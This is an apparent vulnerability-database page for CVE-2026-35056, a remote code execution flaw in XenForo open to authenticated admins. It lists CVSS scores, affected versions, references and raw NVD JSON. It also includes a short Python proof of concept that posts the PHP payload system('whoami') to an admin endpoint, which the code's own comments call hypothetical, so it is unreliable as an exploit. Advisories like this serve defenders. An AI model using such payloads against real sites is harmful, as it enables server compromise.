Security Vulnerability Report
中文
CVE-2026-35056 CVSS 7.2 HIGH

CVE-2026-35056

Published: 2026-04-01 01:16:42
Last Modified: 2026-04-01 18:55:19
Source: [email protected]

Description

XenForo before 2.3.9 and before 2.2.18 allows remote code execution (RCE) by authenticated, but malicious, admin users. An attacker with admin panel access can execute arbitrary code on the server.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:* - VULNERABLE
XenForo < 2.2.18
XenForo < 2.3.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # This is a conceptual Proof of Concept for CVE-2026-35056 # It demonstrates how an authenticated admin might exploit the RCE vulnerability. TARGET_URL = "http://target-xenforo-site.com" ADMIN_USER = "admin" ADMIN_PASS = "password" session = requests.Session() # 1. Login to get admin session login_data = { "login": ADMIN_USER, "password": ADMIN_PASS } login_resp = session.post(f"{TARGET_URL}/login/login", data=login_data) if login_resp.status_code != 200: print("Login failed") exit() print("Logged in successfully.") # 2. Send payload to vulnerable admin endpoint (Hypothetical) # Assuming the vulnerability allows code execution via a specific parameter payload = { "option_value": "system('whoami');", # Malicious PHP code "_xfRedirect": "/admin.php" } exploit_url = f"{TARGET_URL}/admin.php?options/update" resp = session.post(exploit_url, data=payload) if resp.status_code == 200: print("Payload sent. Check response for execution result.") else: print("Exploit failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35056", "sourceIdentifier": "[email protected]", "published": "2026-04-01T01:16:41.593", "lastModified": "2026-04-01T18:55:19.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XenForo before 2.3.9 and before 2.2.18 allows remote code execution (RCE) by authenticated, but malicious, admin users. An attacker with admin panel access can execute arbitrary code on the server."}, {"lang": "es", "value": "XenForo anterior a 2.3.9 y anterior a 2.2.18 permite la ejecución remota de código (RCE) por usuarios administradores autenticados, pero maliciosos. Un atacante con acceso al panel de administración puede ejecutar código arbitrario en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.18", "matchCriteriaId": "78F0F9B0-9777-4266-83FF-74BEF672AAE8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.3.0", "versionEndExcluding": "2.3.9", "matchCriteriaId": "F317C8A1-B2B0-4C3C-AFEE-8B1050F38744"}]}]}], "references": [{"url": "https://www.vulncheck.com/advisories/xenforo-remote-code-execution-via-authenticated-admin", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://xenforo.com/community/threads/xenforo-2-3-9-inc-xfmg-2-2-18-released-security-fix.235659/", "source": "[email protected]", "tags": ["Release Notes"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.